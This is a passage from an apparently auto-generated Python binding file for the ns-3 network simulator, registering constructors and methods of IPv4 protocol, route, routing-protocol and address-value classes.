## ipv4-address.h (module 'network'): bool ns3::Ipv4AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-address.h (module 'network'): std::string ns3::Ipv4AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4AddressValue::Set(ns3::Ipv4Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv4Address const &', 'value')])
return
def register_Ns3Ipv4L3Protocol_methods(root_module, cls):
## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4L3Protocol::Ipv4L3Protocol() [constructor]
cls.add_constructor([])
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::AddAddress(uint32_t i, ns3::Ipv4InterfaceAddress address) [member function]
cls.add_method('AddAddress',
'bool',
[param('uint32_t', 'i'), param('ns3::Ipv4InterfaceAddress', 'address')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): uint32_t ns3::Ipv4L3Protocol::AddInterface(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('AddInterface',
'uint32_t',
[param('ns3::Ptr< ns3::NetDevice >', 'device')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::Socket> ns3::Ipv4L3Protocol::CreateRawSocket() [member function]
cls.add_method('CreateRawSocket',
'ns3::Ptr< ns3::Socket >',
[])
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::DeleteRawSocket(ns3::Ptr<ns3::Socket> socket) [member function]
cls.add_method('DeleteRawSocket',
'void',
[param('ns3::Ptr< ns3::Socket >', 'socket')])
## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4InterfaceAddress ns3::Ipv4L3Protocol::GetAddress(uint32_t interfaceIndex, uint32_t addressIndex) const [member function]
cls.add_method('GetAddress',
'ns3::Ipv4InterfaceAddress',
[param('uint32_t', 'interfaceIndex'), param('uint32_t', 'addressIndex')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::Ipv4Interface> ns3::Ipv4L3Protocol::GetInterface(uint32_t i) const [member function]
cls.add_method('GetInterface',
'ns3::Ptr< ns3::Ipv4Interface >',
[param('uint32_t', 'i')],
is_const=True)
## ipv4-l3-protocol.h (module 'internet'): int32_t ns3::Ipv4L3Protocol::GetInterfaceForAddress(ns3::Ipv4Address addr) const [member function]
cls.add_method('GetInterfaceForAddress',
'int32_t',
[param('ns3::Ipv4Address', 'addr')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): int32_t ns3::Ipv4L3Protocol::GetInterfaceForDevice(ns3::Ptr<const ns3::NetDevice> device) const [member function]
cls.add_method('GetInterfaceForDevice',
'int32_t',
[param('ns3::Ptr< ns3::NetDevice const >', 'device')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): int32_t ns3::Ipv4L3Protocol::GetInterfaceForPrefix(ns3::Ipv4Address addr, ns3::Ipv4Mask mask) const [member function]
cls.add_method('GetInterfaceForPrefix',
'int32_t',
[param('ns3::Ipv4Address', 'addr'), param('ns3::Ipv4Mask', 'mask')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): uint16_t ns3::Ipv4L3Protocol::GetMetric(uint32_t i) const [member function]
cls.add_method('GetMetric',
'uint16_t',
[param('uint32_t', 'i')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): uint16_t ns3::Ipv4L3Protocol::GetMtu(uint32_t i) const [member function]
cls.add_method('GetMtu',
'uint16_t',
[param('uint32_t', 'i')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): uint32_t ns3::Ipv4L3Protocol::GetNAddresses(uint32_t interface) const [member function]
cls.add_method('GetNAddresses',
'uint32_t',
[param('uint32_t', 'interface')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): uint32_t ns3::Ipv4L3Protocol::GetNInterfaces() const [member function]
cls.add_method('GetNInterfaces',
'uint32_t',
[],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::NetDevice> ns3::Ipv4L3Protocol::GetNetDevice(uint32_t i) [member function]
cls.add_method('GetNetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'i')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::Ipv4L4Protocol> ns3::Ipv4L3Protocol::GetProtocol(int protocolNumber) const [member function]
cls.add_method('GetProtocol',
'ns3::Ptr< ns3::Ipv4L4Protocol >',
[param('int', 'protocolNumber')],
is_const=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4L3Protocol::GetRoutingProtocol() const [member function]
cls.add_method('GetRoutingProtocol',
'ns3::Ptr< ns3::Ipv4RoutingProtocol >',
[],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): static ns3::TypeId ns3::Ipv4L3Protocol::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::Insert(ns3::Ptr<ns3::Ipv4L4Protocol> protocol) [member function]
cls.add_method('Insert',
'void',
[param('ns3::Ptr< ns3::Ipv4L4Protocol >', 'protocol')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::IsDestinationAddress(ns3::Ipv4Address address, uint32_t iif) const [member function]
cls.add_method('IsDestinationAddress',
'bool',
[param('ns3::Ipv4Address', 'address'), param('uint32_t', 'iif')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::IsForwarding(uint32_t i) const [member function]
cls.add_method('IsForwarding',
'bool',
[param('uint32_t', 'i')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::IsUp(uint32_t i) const [member function]
cls.add_method('IsUp',
'bool',
[param('uint32_t', 'i')],
is_const=True, is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::Receive(ns3::Ptr<ns3::NetDevice> device, ns3::Ptr<const ns3::Packet> p, uint16_t protocol, ns3::Address const & from, ns3::Address const & to, ns3::NetDevice::PacketType packetType) [member function]
cls.add_method('Receive',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'device'), param('ns3::Ptr< ns3::Packet const >', 'p'), param('uint16_t', 'protocol'), param('ns3::Address const &', 'from'), param('ns3::Address const &', 'to'), param('ns3::NetDevice::PacketType', 'packetType')])
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::Remove(ns3::Ptr<ns3::Ipv4L4Protocol> protocol) [member function]
cls.add_method('Remove',
'void',
[param('ns3::Ptr< ns3::Ipv4L4Protocol >', 'protocol')])
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::RemoveAddress(uint32_t interfaceIndex, uint32_t addressIndex) [member function]
cls.add_method('RemoveAddress',
'bool',
[param('uint32_t', 'interfaceIndex'), param('uint32_t', 'addressIndex')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4L3Protocol::SelectSourceAddress(ns3::Ptr<const ns3::NetDevice> device, ns3::Ipv4Address dst, ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e scope) [member function]
cls.add_method('SelectSourceAddress',
'ns3::Ipv4Address',
[param('ns3::Ptr< ns3::NetDevice const >', 'device'), param('ns3::Ipv4Address', 'dst'), param('ns3::Ipv4InterfaceAddress::InterfaceAddressScope_e', 'scope')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::Send(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Address source, ns3::Ipv4Address destination, uint8_t protocol, ns3::Ptr<ns3::Ipv4Route> route) [member function]
cls.add_method('Send',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Address', 'source'), param('ns3::Ipv4Address', 'destination'), param('uint8_t', 'protocol'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SendWithHeader(ns3::Ptr<ns3::Packet> packet, ns3::Ipv4Header ipHeader, ns3::Ptr<ns3::Ipv4Route> route) [member function]
cls.add_method('SendWithHeader',
'void',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Ipv4Header', 'ipHeader'), param('ns3::Ptr< ns3::Ipv4Route >', 'route')])
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetDefaultTtl(uint8_t ttl) [member function]
cls.add_method('SetDefaultTtl',
'void',
[param('uint8_t', 'ttl')])
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetDown(uint32_t i) [member function]
cls.add_method('SetDown',
'void',
[param('uint32_t', 'i')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetForwarding(uint32_t i, bool val) [member function]
cls.add_method('SetForwarding',
'void',
[param('uint32_t', 'i'), param('bool', 'val')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetMetric(uint32_t i, uint16_t metric) [member function]
cls.add_method('SetMetric',
'void',
[param('uint32_t', 'i'), param('uint16_t', 'metric')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')])
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetRoutingProtocol(ns3::Ptr<ns3::Ipv4RoutingProtocol> routingProtocol) [member function]
cls.add_method('SetRoutingProtocol',
'void',
[param('ns3::Ptr< ns3::Ipv4RoutingProtocol >', 'routingProtocol')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetUp(uint32_t i) [member function]
cls.add_method('SetUp',
'void',
[param('uint32_t', 'i')],
is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): ns3::Ipv4L3Protocol::PROT_NUMBER [variable]
cls.add_static_attribute('PROT_NUMBER', 'uint16_t const', is_const=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::NotifyNewAggregate() [member function]
cls.add_method('NotifyNewAggregate',
'void',
[],
visibility='protected', is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::GetIpForward() const [member function]
cls.add_method('GetIpForward',
'bool',
[],
is_const=True, visibility='private', is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): bool ns3::Ipv4L3Protocol::GetWeakEsModel() const [member function]
cls.add_method('GetWeakEsModel',
'bool',
[],
is_const=True, visibility='private', is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetIpForward(bool forward) [member function]
cls.add_method('SetIpForward',
'void',
[param('bool', 'forward')],
visibility='private', is_virtual=True)
## ipv4-l3-protocol.h (module 'internet'): void ns3::Ipv4L3Protocol::SetWeakEsModel(bool model) [member function]
cls.add_method('SetWeakEsModel',
'void',
[param('bool', 'model')],
visibility='private', is_virtual=True)
return
def register_Ns3Ipv4L4Protocol_methods(root_module, cls):
## ipv4-l4-protocol.h (module 'internet'): ns3::Ipv4L4Protocol::Ipv4L4Protocol() [constructor]
cls.add_constructor([])
## ipv4-l4-protocol.h (module 'internet'): ns3::Ipv4L4Protocol::Ipv4L4Protocol(ns3::Ipv4L4Protocol const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4L4Protocol const &', 'arg0')])
## ipv4-l4-protocol.h (module 'internet'): ns3::Callback<void,ns3::Ptr<ns3::Packet>,ns3::Ipv4Address,ns3::Ipv4Address,unsigned char,ns3::Ptr<ns3::Ipv4Route>,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ns3::Ipv4L4Protocol::GetDownTarget() const [member function]
cls.add_method('GetDownTarget',
'ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::Ipv4Address, ns3::Ipv4Address, unsigned char, ns3::Ptr< ns3::Ipv4Route >, ns3::empty, ns3::empty, ns3::empty, ns3::empty >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4-l4-protocol.h (module 'internet'): int ns3::Ipv4L4Protocol::GetProtocolNumber() const [member function]
cls.add_method('GetProtocolNumber',
'int',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4-l4-protocol.h (module 'internet'): static ns3::TypeId ns3::Ipv4L4Protocol::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ipv4-l4-protocol.h (module 'internet'): ns3::Ipv4L4Protocol::RxStatus ns3::Ipv4L4Protocol::Receive(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::Ipv4Interface> incomingInterface) [member function]
cls.add_method('Receive',
'ns3::Ipv4L4Protocol::RxStatus',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::Ipv4Interface >', 'incomingInterface')],
is_pure_virtual=True, is_virtual=True)
## ipv4-l4-protocol.h (module 'internet'): void ns3::Ipv4L4Protocol::ReceiveIcmp(ns3::Ipv4Address icmpSource, uint8_t icmpTtl, uint8_t icmpType, uint8_t icmpCode, uint32_t icmpInfo, ns3::Ipv4Address payloadSource, ns3::Ipv4Address payloadDestination, uint8_t const * payload) [member function]
cls.add_method('ReceiveIcmp',
'void',
[param('ns3::Ipv4Address', 'icmpSource'), param('uint8_t', 'icmpTtl'), param('uint8_t', 'icmpType'), param('uint8_t', 'icmpCode'), param('uint32_t', 'icmpInfo'), param('ns3::Ipv4Address', 'payloadSource'), param('ns3::Ipv4Address', 'payloadDestination'), param('uint8_t const *', 'payload')],
is_virtual=True)
## ipv4-l4-protocol.h (module 'internet'): void ns3::Ipv4L4Protocol::SetDownTarget(ns3::Callback<void,ns3::Ptr<ns3::Packet>,ns3::Ipv4Address,ns3::Ipv4Address,unsigned char,ns3::Ptr<ns3::Ipv4Route>,ns3::empty,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
cls.add_method('SetDownTarget',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::Packet >, ns3::Ipv4Address, ns3::Ipv4Address, unsigned char, ns3::Ptr< ns3::Ipv4Route >, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3Ipv4MaskChecker_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker(ns3::Ipv4MaskChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4MaskChecker const &', 'arg0')])
return
def register_Ns3Ipv4MaskValue_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4MaskValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4MaskValue const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4Mask const & value) [constructor]
cls.add_constructor([param('ns3::Ipv4Mask const &', 'value')])
## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4MaskValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4MaskValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Mask ns3::Ipv4MaskValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv4Mask',
[],
is_const=True)
## ipv4-address.h (module 'network'): std::string ns3::Ipv4MaskValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4MaskValue::Set(ns3::Ipv4Mask const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv4Mask const &', 'value')])
return
def register_Ns3Ipv4MulticastRoute_methods(root_module, cls):
## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::Ipv4MulticastRoute(ns3::Ipv4MulticastRoute const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4MulticastRoute const &', 'arg0')])
## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::Ipv4MulticastRoute() [constructor]
cls.add_constructor([])
## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4MulticastRoute::GetGroup() const [member function]
cls.add_method('GetGroup',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4MulticastRoute::GetOrigin() const [member function]
cls.add_method('GetOrigin',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-route.h (module 'internet'): uint32_t ns3::Ipv4MulticastRoute::GetOutputTtl(uint32_t oif) [member function]
cls.add_method('GetOutputTtl',
'uint32_t',
[param('uint32_t', 'oif')],
deprecated=True)
## ipv4-route.h (module 'internet'): std::map<unsigned int, unsigned int, std::less<unsigned int>, std::allocator<std::pair<unsigned int const, unsigned int> > > ns3::Ipv4MulticastRoute::GetOutputTtlMap() const [member function]
cls.add_method('GetOutputTtlMap',
'std::map< unsigned int, unsigned int >',
[],
is_const=True)
## ipv4-route.h (module 'internet'): uint32_t ns3::Ipv4MulticastRoute::GetParent() const [member function]
cls.add_method('GetParent',
'uint32_t',
[],
is_const=True)
## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetGroup(ns3::Ipv4Address const group) [member function]
cls.add_method('SetGroup',
'void',
[param('ns3::Ipv4Address const', 'group')])
## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetOrigin(ns3::Ipv4Address const origin) [member function]
cls.add_method('SetOrigin',
'void',
[param('ns3::Ipv4Address const', 'origin')])
## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetOutputTtl(uint32_t oif, uint32_t ttl) [member function]
cls.add_method('SetOutputTtl',
'void',
[param('uint32_t', 'oif'), param('uint32_t', 'ttl')])
## ipv4-route.h (module 'internet'): void ns3::Ipv4MulticastRoute::SetParent(uint32_t iif) [member function]
cls.add_method('SetParent',
'void',
[param('uint32_t', 'iif')])
## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::MAX_INTERFACES [variable]
cls.add_static_attribute('MAX_INTERFACES', 'uint32_t const', is_const=True)
## ipv4-route.h (module 'internet'): ns3::Ipv4MulticastRoute::MAX_TTL [variable]
cls.add_static_attribute('MAX_TTL', 'uint32_t const', is_const=True)
return
def register_Ns3Ipv4Route_methods(root_module, cls):
cls.add_output_stream_operator()
## ipv4-route.h (module 'internet'): ns3::Ipv4Route::Ipv4Route(ns3::Ipv4Route const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4Route const &', 'arg0')])
## ipv4-route.h (module 'internet'): ns3::Ipv4Route::Ipv4Route() [constructor]
cls.add_constructor([])
## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Route::GetDestination() const [member function]
cls.add_method('GetDestination',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Route::GetGateway() const [member function]
cls.add_method('GetGateway',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-route.h (module 'internet'): ns3::Ptr<ns3::NetDevice> ns3::Ipv4Route::GetOutputDevice() const [member function]
cls.add_method('GetOutputDevice',
'ns3::Ptr< ns3::NetDevice >',
[],
is_const=True)
## ipv4-route.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Route::GetSource() const [member function]
cls.add_method('GetSource',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetDestination(ns3::Ipv4Address dest) [member function]
cls.add_method('SetDestination',
'void',
[param('ns3::Ipv4Address', 'dest')])
## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetGateway(ns3::Ipv4Address gw) [member function]
cls.add_method('SetGateway',
'void',
[param('ns3::Ipv4Address', 'gw')])
## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetOutputDevice(ns3::Ptr<ns3::NetDevice> outputDevice) [member function]
cls.add_method('SetOutputDevice',
'void',
[param('ns3::Ptr< ns3::NetDevice >', 'outputDevice')])
## ipv4-route.h (module 'internet'): void ns3::Ipv4Route::SetSource(ns3::Ipv4Address src) [member function]
cls.add_method('SetSource',
'void',
[param('ns3::Ipv4Address', 'src')])
return
def register_Ns3Ipv4RoutingProtocol_methods(root_module, cls):
## ipv4-routing-protocol.h (module 'internet'): ns3::Ipv4RoutingProtocol::Ipv4RoutingProtocol() [constructor]
cls.add_constructor([])
## ipv4-routing-protocol.h (module 'internet'): ns3::Ipv4RoutingProtocol::Ipv4RoutingProtocol(ns3::Ipv4RoutingProtocol const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4RoutingProtocol const &', 'arg0')])
## ipv4-routing-protocol.h (module 'internet'): static ns3::TypeId ns3::Ipv4RoutingProtocol::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyAddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
cls.add_method('NotifyAddAddress',
'void',
[param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
is_pure_virtual=True, is_virtual=True)
## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyInterfaceDown(uint32_t interface) [member function]
cls.add_method('NotifyInterfaceDown',
'void',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_virtual=True)
## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyInterfaceUp(uint32_t interface) [member function]
cls.add_method('NotifyInterfaceUp',
'void',
[param('uint32_t', 'interface')],
is_pure_virtual=True, is_virtual=True)
## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::NotifyRemoveAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
cls.add_method('NotifyRemoveAddress',
'void',
[param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
is_pure_virtual=True, is_virtual=True)
## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::PrintRoutingTable(ns3::Ptr<ns3::OutputStreamWrapper> stream) const [member function]
cls.add_method('PrintRoutingTable',
'void',
[param('ns3::Ptr< ns3::OutputStreamWrapper >', 'stream')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## ipv4-routing-protocol.h (module 'internet'): bool ns3::Ipv4RoutingProtocol::RouteInput(ns3::Ptr<const ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<const ns3::NetDevice> idev, ns3::Callback<void,ns3::Ptr<ns3::Ipv4Route>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ucb, ns3::Callback<void,ns3::Ptr<ns3::Ipv4MulticastRoute>,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> mcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,unsigned int,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> lcb, ns3::Callback<void,ns3::Ptr<const ns3::Packet>,const ns3::Ipv4Header&,ns3::Socket::SocketErrno,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> ecb) [member function]
cls.add_method('RouteInput',
'bool',
[param('ns3::Ptr< ns3::Packet const >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice const >', 'idev'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'lcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')],
is_pure_virtual=True, is_virtual=True)
## ipv4-routing-protocol.h (module 'internet'): ns3::Ptr<ns3::Ipv4Route> ns3::Ipv4RoutingProtocol::RouteOutput(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::NetDevice> oif, ns3::Socket::SocketErrno & sockerr) [member function]
cls.add_method('RouteOutput',
'ns3::Ptr< ns3::Ipv4Route >',
[param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice >', 'oif'), param('ns3::Socket::SocketErrno &', 'sockerr')],
is_pure_virtual=True, is_virtual=True)
## ipv4-routing-protocol.h (module 'internet'): void ns3::Ipv4RoutingProtocol::SetIpv4(ns3::Ptr<ns3::Ipv4> ipv4) [member function]
cls.add_method('SetIpv4',
'void',
[param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3Ipv6AddressChecker_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker(ns3::Ipv6AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6AddressChecker const &', 'arg0')])
return
def register_Ns3Ipv6AddressValue_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6AddressValue const &', 'arg0')])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6Address const & value) [constructor]
cls.add_constructor([param('ns3::Ipv6Address const &', 'value')])
## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv6Address',
[],
is_const=True)
## ipv6-address.h (module 'network'): std::string ns3::Ipv6AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6AddressValue::Set(ns3::Ipv6Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv6Address const &', 'value')])
return
def register_Ns3Ipv6PrefixChecker_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker() [constructor]
